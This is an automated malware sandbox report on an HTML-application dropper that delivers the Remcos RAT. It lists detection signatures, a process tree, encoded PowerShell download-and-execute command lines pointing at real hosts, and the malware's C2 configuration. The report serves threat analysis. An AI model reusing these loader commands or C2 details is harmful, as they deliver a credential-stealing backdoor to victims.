Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta

Overview

General Information

Sample name:greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
Analysis ID:1576578
MD5:b4a181ad1acd008c45ba11fd3b518ca2
SHA1:60b4d2b833454c10d8588a67c018498ebfe9e7f5
SHA256:83fc39130474afeb1d69b21603b9e7495584741eda2ca2248db4730d4e966705
Tags:htaRemcosRATuser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7768 cmdline: mshta.exe "C:\Users\user\Desktop\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7840 cmdline: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7884 cmdline: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 8008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 8024 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0F9.tmp" "c:\Users\user\AppData\Local\Temp\eykjjr5p\CSC29E03D134814371801318532EC93FB.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 8136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 8184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 6348 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
            • CasPol.exe (PID: 6832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.3843532128.0000000002DBE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 21 entries
                SourceRuleDescriptionAuthorStrings
                12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      12.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6b6f8:$a1: Remcos restarted by watchdog!
                      • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                      12.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                      • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x65a04:$str_b2: Executing file:
                      • 0x6683c:$str_b3: GetDirectListeningPort
                      • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x66380:$str_b7: \update.vbs
                      • 0x65a2c:$str_b9: Downloaded file:
                      • 0x65a18:$str_b10: Downloading file:
                      • 0x65abc:$str_b12: Failed to upload file:
                      • 0x66804:$str_b13: StartForward
                      • 0x66824:$str_b14: StopForward
                      • 0x662d8:$str_b15: fso.DeleteFile "
                      • 0x6626c:$str_b16: On Error Resume Next
                      • 0x66308:$str_b17: fso.DeleteFolder "
                      • 0x65aac:$str_b18: Uploaded file:
                      • 0x65a6c:$str_b19: Unable to delete:
                      • 0x662a0:$str_b20: while fso.FileExists("
                      • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                      Click to see the 20 entries
                      SourceRuleDescriptionAuthorStrings
                      amsi32_8184.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_8184.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFz
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , ProcessId: 8136, ProcessName: wscript.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVu